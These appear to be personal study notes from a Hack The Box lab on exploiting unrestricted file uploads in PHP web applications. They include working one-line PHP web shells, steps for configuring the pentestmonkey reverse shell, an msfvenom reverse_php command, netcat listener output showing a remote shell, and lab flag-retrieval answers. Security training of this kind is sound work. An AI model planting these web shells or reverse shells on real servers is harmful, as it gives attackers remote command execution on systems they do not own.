Basic Explotaition
Absent Validation
When the web application does not have any form of validation filters on the uploaded files, allowing the upload of any file type by default.
Arbitrary File Upload
We can drag and drop any file we want, and its name will appear on the upload form, including .php files -->
Identifying Web Framework
One easy method to determine what language runs the web application is to visit the /index.ext page, where we would swap out ext with various common web extensions, like php, asp, aspx, among others, to see whether any of them exist.
For example, when we visit our exercise below, we see its URL as http://SERVER_IP:PORT/, as the index page is usually hidden by default. But, if we try visiting http://SERVER_IP:PORT/index.php, we would get the same page, which means that this is indeed a PHP web application
We do not need to do this manually, of course, as we can use a tool like Burp Intruder for fuzzing the file extension using a Web Extensions wordlist, as we will see in upcoming sections.
Vulnerability Identification
As an initial test to identify whether we can upload arbitrary PHP files, let's create a basic Hello World script to test whether we can execute PHP code with our uploaded file.
To do so, we will write <?php echo "Hello HTB";?> to test.php, and try uploading it to the web application:
PoCs - Questions
Try to upload a PHP script that executes the (hostname) command on the back-end server, and submit the first word of it as the answer.
## Create a php file and upload, example: hsh.php
<?php system('hostname'); ?>Upload Exploitation
Web Shells
One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell. Furthermore, SecLists provides a plethora of web shells for different frameworks and languages
Let's try to upload phpbash.php from phpbash to our web application, and then navigate to its link by clicking on the Download button:
Writing Custom Web Shell
For example, with PHP web applications, we can use the system() function that executes system commands and prints their output, and pass it the cmd parameter with $_REQUEST['cmd'], as follows:
<?php system($_REQUEST['cmd']); ?>
## or
<?php system($_GET['cmd']); ?>
Reverse Shell
Let's download one of the above reverse shell scripts, like the pentestmonkey, and then open it in a text editor to input our IP and listening PORT, which the script will connect to. For the pentestmonkey script, we can modify lines 49 and 50 and input our machine's IP/PORT:
## In the file chahge this
$ip = 'OUR_IP'; // CHANGE THIS
$port = OUR_PORT; // CHANGE THIS
## On our machine
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [188.166.173.208] 35232
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Generating Custom Reverse Shell Scripts
Tools like msfvenom can generate a reverse shell script in many languages and may even attempt to bypass certain restrictions in place. We can do so as follows for PHP
eldeim@htb[/htb]$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
...SNIP...
Payload size: 3033 bytes
###########################################
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [181.151.182.286] 56232
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)PoCs - Questions
Try to exploit the upload feature to upload a web shell and get the content of /flag.txt
We can upload a basic REQUEST web shell or a phpbash shell -->
<?php system($_GET['cmd']); ?> ## ws.php
## or
phpbash.php ## Download of githubLast updated